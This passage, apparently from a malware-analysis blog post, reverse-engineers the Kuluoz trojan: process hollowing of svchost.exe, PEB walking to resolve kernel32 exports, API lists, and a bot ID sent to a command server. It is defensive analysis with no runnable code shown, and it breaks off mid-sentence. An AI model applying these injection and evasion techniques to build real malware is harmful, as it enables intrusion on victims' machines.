<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbvs9XTGgHQqLizDglXj_ikOrxbkF04tGeU6Xu10SpJ6lVBqq_wOrrtHc7u5nb0w7-wCkJfpw07cQ1TlZKV4I6eyGVyskTi-DdMy_cGN8qJSSXdTp58q-kAUXzctSLzvlALkMuk58Y/s1600/Create+suspended+process+of+svchost.exe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbvs9XTGgHQqLizDglXj_ikOrxbkF04tGeU6Xu10SpJ6lVBqq_wOrrtHc7u5nb0w7-wCkJfpw07cQ1TlZKV4I6eyGVyskTi-DdMy_cGN8qJSSXdTp58q-kAUXzctSLzvlALkMuk58Y/s1600/Create+suspended+process+of+svchost.exe.png" height="46" width="320" /></span></a></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<span style="font-weight: normal;"><span style="font-family: inherit; font-size: small;"><i><span lang="EN-US">Create suspended process of
svchost.exe</span></i><span lang="EN-US"><o:p></o:p></span></span></span></div>
<div class="MsoNoSpacing">
<span style="font-weight: normal;"><span style="font-size: small;"><span lang="EN-US" style="font-family: inherit;"><br /></span></span></span></div>
<div class="MsoNoSpacing">
<span style="font-weight: normal;"><span style="font-family: inherit; font-size: small;"><span lang="EN-US">Next, it will create a memory section
using</span><span class="apple-converted-space"><span lang="EN-US"> </span></span><i><span lang="EN-US">ZwCreateSection</span></i><span class="apple-converted-space"><i><span lang="EN-US"> </span></i></span><span lang="EN-US">and maps a section
location using</span><span class="apple-converted-space"><span lang="EN-US"> </span></span><i><span lang="EN-US">ZwMapViewofSection</span></i><span class="apple-converted-space"><i><span lang="EN-US"> </span></i></span><span lang="EN-US">in order to copy portion
of its code into memory address 0x00090000.</span></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7ljPK3YEgoElAvrzMCG0h_lStloKWvC0FvVAhFzpxI06PVaKff__tWjfxxial9hRANgCm7QG6NL9yj4YA5VMPSM5IYNGA-6KSGXfVn9zBn2ieaBmsE_CLgNQZnVIk_GBtR3Y7Mojz/s1600/A+portion+of+kuluoz+code+copied+in+memory.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7ljPK3YEgoElAvrzMCG0h_lStloKWvC0FvVAhFzpxI06PVaKff__tWjfxxial9hRANgCm7QG6NL9yj4YA5VMPSM5IYNGA-6KSGXfVn9zBn2ieaBmsE_CLgNQZnVIk_GBtR3Y7Mojz/s1600/A+portion+of+kuluoz+code+copied+in+memory.png" height="245" width="320" /></span></a></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">A portion of kuluoz code
copied in memory<o:p></o:p></span></span></i></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-weight: normal;"><span style="font-family: inherit; font-size: small;"><span lang="EN-US">Then it allocates another memory region
to copy svchost.exe data in memory using</span><span class="apple-converted-space"><span lang="EN-US"> </span></span><i><span lang="EN-US">ZwReadVirtualMemory.</span></i></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0E9O41sVyh-pXwDifZMWMwHLqNDJmjXxdTL40ItxJIOoVBAa6dcIMaKp8MhsGJXRopSdkCgo-rjaSPKgyWdJkmowGINB-WjMRu-sikLLUoqNWeJ7cr7d7YoTwLFZEHzfiqTGhKA5F/s1600/svchost.exe+copied+in+memory.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0E9O41sVyh-pXwDifZMWMwHLqNDJmjXxdTL40ItxJIOoVBAa6dcIMaKp8MhsGJXRopSdkCgo-rjaSPKgyWdJkmowGINB-WjMRu-sikLLUoqNWeJ7cr7d7YoTwLFZEHzfiqTGhKA5F/s1600/svchost.exe+copied+in+memory.png" height="240" width="320" /></span></a></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">svchost.exe copied in
memory<o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It then traverses the entry point for
svchost.exe in memory and overwrites it with the following instructions in
order to jump to its malicious code.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFem4Bv2QKLVfQNP-2YAYuzzE2biT74XGBxsKdF-g4HvnfyTou9cVjaft4pBoezeD-AtvCV1lf4889YSIbolFn24sPMn3-LCCBRsmFlGhzUjB76Hzd423L7nJU2_f8O1uHqnh91W_o/s1600/Entry+point+of+svchost.exe+overwritten+to+point+to+malware+code.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFem4Bv2QKLVfQNP-2YAYuzzE2biT74XGBxsKdF-g4HvnfyTou9cVjaft4pBoezeD-AtvCV1lf4889YSIbolFn24sPMn3-LCCBRsmFlGhzUjB76Hzd423L7nJU2_f8O1uHqnh91W_o/s1600/Entry+point+of+svchost.exe+overwritten+to+point+to+malware+code.png" height="23" width="320" /></span></a></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Entry point of svchost.exe
overwritten to point to malware code<o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Bingo! From the image above we can see
that kuluoz wants to execute at memory space 0x00090000, which in truth holds
its malicious routines that was mapped earlier.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">After that, it will recopy all the
changes done to svchost.exe into another memory region before unmapping,
effectively saving all the modifications done to svchost.exe that is loaded in
memory.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It then makes use of<span class="apple-converted-space"> </span><i>CreateEventA</i><span class="apple-converted-space"> </span>to create an event with a string name
of “y76gDDb3”.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><span lang="EN-US" style="font-weight: normal;"><span style="font-size: small;">After which, the suspended process of
svchost.exe is resumed by calling<span class="apple-converted-space"> </span><i>ZwResumeThread</i>.</span></span><span lang="EN-US" style="font-size: 13.5pt;"><o:p></o:p></span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: inherit;"><br /></span></div>
</h2>
<h4>
<i><span lang="EN-US" style="font-family: inherit;">GETTING TO “WORK”
(WHERE THE FUN STARTS!):</span></i></h4>
<h2>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Let’s analyze the code injected at
svchost.exe shall we?<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Kuluoz code is located at 0x00090000.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It starts off by traversing <a href="http://en.wikipedia.org/wiki/Process_Environment_Block">Process
Environment Block</a> (PEB) to obtain the image base address of kernel32.dll
and get to its export table.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">A more detailed explanation on how it
was done is seen in the image below.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA1IwZwSUkap3GNq-73xX7Wehd65_ALhAPB06UOYlwMnFdKKNWIpfTsvjm_vkfGAf_IQY3FlGBdMaJJVo_1Rmb6sJjlx7mYdhXLKU2N3JhW95WS9eoyNjqNHPVDn-iM4btxMfjjodD/s1600/Traversing+PEB+to+get+to+kernel32.dll+exports.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA1IwZwSUkap3GNq-73xX7Wehd65_ALhAPB06UOYlwMnFdKKNWIpfTsvjm_vkfGAf_IQY3FlGBdMaJJVo_1Rmb6sJjlx7mYdhXLKU2N3JhW95WS9eoyNjqNHPVDn-iM4btxMfjjodD/s1600/Traversing+PEB+to+get+to+kernel32.dll+exports.png" height="142" width="320" /></span></a></div>
<div align="center" style="margin-bottom: .0001pt; margin: 0in; text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Traversing PEB to get to kernel32.dll exports<o:p></o:p></span></span></i></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It gets to the list of module names and
compares it against a hash of <i>kernel32.dll</i>
which is 0x6A4ABC5B. This little code of “walking” the PEB to get to
kernel32.dll has also been used by other malwares such as Zeus.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It looks for <i>GetProcAddress </i>function and uses it to get function addresses of<i> GetModuleHandleA, LoadLibraryA,
ExitProcess, </i>and<i> VirtualAlloc </i>in<i> kernel32.dl, </i>and<i> memset, memcpy </i>and<i> _stricmp </i>in<i> ntdll.dll.<o:p></o:p></i></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It then continues to get addresses of
the following APIs:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">For KERNEL32.Dll:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">OpenProcess<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HeapCreate<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CreateMutexA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetLastError<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetCurrentProcess<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">TerminateProcess<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">WideCharToMultiByte<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">OpenEventA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetSystemTimeAsFileTime<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetCurrentProcessId<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">DeleteFileA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Sleep<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetFileInformationByHandle<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ReadFile<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">SetEvent<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ResumeThread<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CreateProcessA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CreateFileA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">WriteFile<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CloseHandle<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetProcessHeap<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HeapAlloc<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HeapFree<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetModuleHandleA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetTickCount<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">VirtualAlloc<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">VirtualFree<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">LoadLibraryA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetProccAddress<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">For ADVAPI32.DLL:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CryptDestroyHash<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CryptEncrypt<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CryptCreateHash<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CryptHashData<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CryptVerifySignatureA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegDeleteKeyA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegCreateKeyA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegSetValueExA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegOpenKeyA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegEnumKeyExA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegEnumValueA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetUserNameA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">LookUpAccountNameA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegOpenKeyExA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegQueryValueExA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegCloseKey<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CryptAcquireContextA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegDeleteValueA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">MD5Init<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">MD5Update<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">MD5Final<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">For SHELL32.DLL:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">SHGetSpecialFolderPathA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">For OLE32.DLL:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CoInitialize<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CoCreateInstance<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">For WS2_32.DLL:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">WSAStartup<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">WSACleanup<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">inet_addr<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">inet_ntoa<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">For WININET.DLL:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">InternetCloseHandle<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">InternetReadFile<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HttpSendRequestA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HttpOpenRequestA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">InternetConnectA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">InternetOpenA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">For MSVCRT.DLL:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">free<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">malloc<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">memset<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">wcstombs<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">_wcsicmp<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">mbstowcs<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">memcpy<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">For CRYPT32.DLL:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CryptImportPublicKeyInfo<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CryptStringToBinaryA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CrypteDecodeObjectEx<o:p></o:p></span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Using <i>VirtualAlloc,</i> it will allocate memory space for itself to copy
stubs of it code using memcpy.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaUPt3ymgsg7MnnMFuJ7dW5I3_eDgPYG4968slbcj0EN6G1_HQdiYOe20ttIS3uSilF931_-kR5gf5dvWFbkBsGIQX8f6Pomc0GC1yfDeOjO4Ild6HWga7nxZeea-NGRI-sstYSTRY/s1600/Work+function+copied+in+memory.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaUPt3ymgsg7MnnMFuJ7dW5I3_eDgPYG4968slbcj0EN6G1_HQdiYOe20ttIS3uSilF931_-kR5gf5dvWFbkBsGIQX8f6Pomc0GC1yfDeOjO4Ild6HWga7nxZeea-NGRI-sstYSTRY/s1600/Work+function+copied+in+memory.png" height="240" width="320" /></span></a></div>
<div align="center" style="margin-bottom: .0001pt; margin: 0in; text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Work Function copied in memory<o:p></o:p></span></span></i></div>
<div align="center" style="margin-bottom: .0001pt; margin: 0in; text-align: center;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-size: small;">These code stubs belongs to its kuluoz
dll exported function named <i>“Work” </i>which
is subsequently called after.</span></span><o:p></o:p></span></div>
</h2>
<h4>
<span style="font-family: inherit;"><span class="Heading3Char"><i><span lang="EN-US">SO WHAT’S INSIDE?</span></i></span><i><span lang="EN-US">:</span></i></span></h4>
<h2>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Inside of “<i>Work” </i>module<i>, </i>the Trojan
uses again <i>GetProcAddress </i>to get the
addresses of the following APIs.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">_stricmp<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">strcat<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">strlen<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">strcpy<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">sprintf<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">sscanf<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">memset<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">memcpy<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">NtQueryInformationProcess<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ZwReadVirtualMemory<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ZwMapViewOfSection<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">NtCreateSection<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ZwUnmapViewOfSection<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ZwResumeThread<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">After
everything is now properly setup first thing that it does is to get the user
name of the account that is currently logged on to Windows by using <i>GetUserNameA</i> and retrieves its equivalent
<a href="http://en.wikipedia.org/wiki/Security_Identifier">Security IDentifier</a>
(SID). It then checks for the installation date of Windows in registry located
at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
“InstallDate”.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">All
these data gathered are then transformed to its MD5 hash equivalent using <i>MD5Init, MD5Update </i>and <i>MD5Final </i>functions. The MD5 hash is used
as a unique ID by the bot in order to be identified by a C2 server.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Each
time it attempts to make a network request to a C2 server (Command-and-Control),
it enumerates all the keys found in HKEY_CURRENT_USER\Software and decrypts
their values and compares to the string “You Fag!!!!!”. If it matches, the data
